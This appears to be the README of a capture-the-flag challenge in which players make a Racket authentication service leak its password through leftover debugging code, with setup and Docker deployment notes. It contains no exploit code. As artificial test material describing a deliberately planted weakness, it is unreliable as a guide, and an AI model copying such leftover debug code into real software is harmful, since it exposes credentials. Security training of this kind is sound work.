National Security has employed you to neutralise the cybernukes by the enemies. These are dangerous virtual rockets that will spam their victims with cat videos. More information can be found on https://youtu.be/K7Hn1rPQouU.
In order to stop the cyber nukes, you will need to breach their firewall. For that, you will first need to find their password. Given is the source code they used for one of their authentication systems. It seems they left some debugging code in that displays the password. Can you get it to print out the password? The authentication software is running on the following connection <show netcat connection>.
## Files
Participants get access to index.rkt
## How to Deploy
Use provided Dockerfile. It will be hosted on port 3000, change it as you like...

Some files were not shown because too many files have changed in this diff Show More